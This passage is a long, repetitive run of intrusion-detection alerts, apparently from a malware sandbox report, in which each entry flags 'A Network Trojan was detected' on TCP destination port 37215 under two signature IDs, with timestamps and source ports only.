          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495734
          SID:2835222
          Source Port:44542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444846
          SID:2835222
          Source Port:51654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731081
          SID:2829579
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542675
          SID:2829579
          Source Port:45102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056182
          SID:2829579
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737066
          SID:2829579
          Source Port:42196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447109
          SID:2835222
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550777
          SID:2835222
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184223
          SID:2829579
          Source Port:48920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742877
          SID:2835222
          Source Port:59576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406348
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549804
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.154837
          SID:2835222
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160682
          SID:2835222
          Source Port:57456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106874
          SID:2829579
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261348
          SID:2829579
          Source Port:46258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237959
          SID:2829579
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016553
          SID:2835222
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795259
          SID:2835222
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136215
          SID:2829579
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704083
          SID:2829579
          Source Port:53254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108406
          SID:2835222
          Source Port:40096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663749
          SID:2835222
          Source Port:40160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406378
          SID:2829579
          Source Port:52638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269274
          SID:2835222
          Source Port:34684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781741
          SID:2835222
          Source Port:34626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606500
          SID:2835222
          Source Port:38178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273387
          SID:2835222
          Source Port:46192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176711
          SID:2835222
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792113
          SID:2829579
          Source Port:42506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409716
          SID:2829579
          Source Port:51992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739305
          SID:2835222
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114316
          SID:2835222
          Source Port:50380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133730
          SID:2829579
          Source Port:59884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841940
          SID:2829579
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731038
          SID:2835222
          Source Port:38644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353010
          SID:2829579
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743529
          SID:2835222
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516580
          SID:2829579
          Source Port:57410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021388
          SID:2835222
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162784
          SID:2829579
          Source Port:35030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600631
          SID:2829579
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467688
          SID:2829579
          Source Port:51132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266264
          SID:2829579
          Source Port:33060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266408
          SID:2835222
          Source Port:55204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467733
          SID:2829579
          Source Port:40070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272116
          SID:2829579
          Source Port:55840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792521
          SID:2835222
          Source Port:40374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403994
          SID:2829579
          Source Port:49632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784239
          SID:2829579
          Source Port:49578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704919
          SID:2835222
          Source Port:40540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734843
          SID:2829579
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853234
          SID:2829579
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729517
          SID:2835222
          Source Port:39222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270448
          SID:2835222
          Source Port:46128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044005
          SID:2835222
          Source Port:53912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792979
          SID:2829579
          Source Port:41368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545591
          SID:2835222
          Source Port:33820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800457
          SID:2829579
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058283
          SID:2835222
          Source Port:60278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075037
          SID:2835222
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268443
          SID:2829579
          Source Port:52086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267705
          SID:2835222
          Source Port:41100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466078
          SID:2835222
          Source Port:55298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353903
          SID:2829579
          Source Port:46510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703532
          SID:2835222
          Source Port:46806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351527
          SID:2829579
          Source Port:37982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705554
          SID:2829579
          Source Port:52412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462513
          SID:2829579
          Source Port:36184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299803
          SID:2829579
          Source Port:44650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746082
          SID:2829579
          Source Port:36932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736692
          SID:2829579
          Source Port:60068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804310
          SID:2829579
          Source Port:38872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510533
          SID:2835222
          Source Port:41582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446584
          SID:2835222
          Source Port:44578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258579
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780602
          SID:2829579
          Source Port:43876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739824
          SID:2829579
          Source Port:56900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169398
          SID:2829579
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354963
          SID:2829579
          Source Port:48918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159328
          SID:2829579
          Source Port:52908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262517
          SID:2829579
          Source Port:35862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258499
          SID:2829579
          Source Port:33624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037284
          SID:2835222
          Source Port:51506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271950
          SID:2829579
          Source Port:47772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745437
          SID:2835222
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238035
          SID:2835222
          Source Port:36852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512676
          SID:2829579
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739870
          SID:2829579
          Source Port:42838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808842
          SID:2829579
          Source Port:38694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016966
          SID:2835222
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410668
          SID:2835222
          Source Port:35788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132893
          SID:2835222
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441970
          SID:2835222
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266127
          SID:2829579
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275412
          SID:2829579
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014735
          SID:2835222
          Source Port:40598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036567
          SID:2829579
          Source Port:50622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897415
          SID:2835222
          Source Port:33552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468768
          SID:2829579
          Source Port:44978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017951
          SID:2829579
          Source Port:36292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151282
          SID:2835222
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731832
          SID:2829579
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151494
          SID:2829579
          Source Port:45938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741982
          SID:2835222
          Source Port:46322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897420
          SID:2829579
          Source Port:56364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038291
          SID:2829579
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.835471
          SID:2835222
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075070
          SID:2835222
          Source Port:58510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732326
          SID:2829579
          Source Port:34714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351326
          SID:2829579
          Source Port:45070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148546
          SID:2829579
          Source Port:41554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152831
          SID:2829579
          Source Port:57198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734665
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037951
          SID:2835222
          Source Port:56574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405040
          SID:2835222
          Source Port:51188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408234
          SID:2829579
          Source Port:49900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780670
          SID:2835222
          Source Port:40830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110406
          SID:2829579
          Source Port:52790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670623
          SID:2835222
          Source Port:47536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037229
          SID:2829579
          Source Port:54780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888295
          SID:2835222
          Source Port:44570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465180
          SID:2829579
          Source Port:43752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113201
          SID:2835222
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667246
          SID:2829579
          Source Port:53386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351977
          SID:2829579
          Source Port:47348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788936
          SID:2829579
          Source Port:37550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743375
          SID:2829579
          Source Port:37978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514074
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732904
          SID:2835222
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600754
          SID:2835222
          Source Port:35150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813626
          SID:2829579
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861350
          SID:2835222
          Source Port:51044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038881
          SID:2829579
          Source Port:32788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739509
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827712
          SID:2835222
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513672
          SID:2829579
          Source Port:53160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746360
          SID:2835222
          Source Port:45906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733847
          SID:2835222
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808526
          SID:2835222
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160747
          SID:2835222
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130673
          SID:2829579
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449127
          SID:2835222
          Source Port:42126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709116
          SID:2835222
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148533
          SID:2829579
          Source Port:58174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044109
          SID:2835222
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238073
          SID:2829579
          Source Port:43360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270340
          SID:2829579
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260707
          SID:2835222
          Source Port:46910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038944
          SID:2829579
          Source Port:37774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042646
          SID:2829579
          Source Port:49688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896715
          SID:2829579
          Source Port:54148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187832
          SID:2835222
          Source Port:59542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066177
          SID:2835222
          Source Port:57566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741750
          SID:2829579
          Source Port:57186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448545
          SID:2835222
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014940
          SID:2829579
          Source Port:58276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817526
          SID:2829579
          Source Port:54866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179481
          SID:2829579
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781883
          SID:2835222
          Source Port:39680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241536
          SID:2829579
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860905
          SID:2829579
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112112
          SID:2835222
          Source Port:41300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465010
          SID:2835222
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259791
          SID:2829579
          Source Port:56972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356014
          SID:2829579
          Source Port:48102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175524
          SID:2835222
          Source Port:44180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599569
          SID:2829579
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108869
          SID:2829579
          Source Port:47648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739868
          SID:2829579
          Source Port:41646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794140
          SID:2829579
          Source Port:52386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600224
          SID:2829579
          Source Port:36444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671834
          SID:2829579
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126588
          SID:2835222
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743790
          SID:2829579
          Source Port:52120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901702
          SID:2829579
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155717
          SID:2829579
          Source Port:55500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153785
          SID:2835222
          Source Port:36030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468133
          SID:2829579
          Source Port:52498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109178
          SID:2835222
          Source Port:48432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545960
          SID:2829579
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861019
          SID:2829579
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158364
          SID:2829579
          Source Port:36942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2829579
          Source Port:53078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175938
          SID:2835222
          Source Port:46078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444338
          SID:2829579
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886932
          SID:2829579
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448921
          SID:2829579
          Source Port:59046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402476
          SID:2835222
          Source Port:49206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131142
          SID:2829579
          Source Port:50578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673435
          SID:2829579
          Source Port:45850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273370
          SID:2835222
          Source Port:47022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269147
          SID:2835222
          Source Port:40772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058216
          SID:2835222
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353622
          SID:2835222
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513829
          SID:2829579
          Source Port:60294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.472018
          SID:2829579
          Source Port:56154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
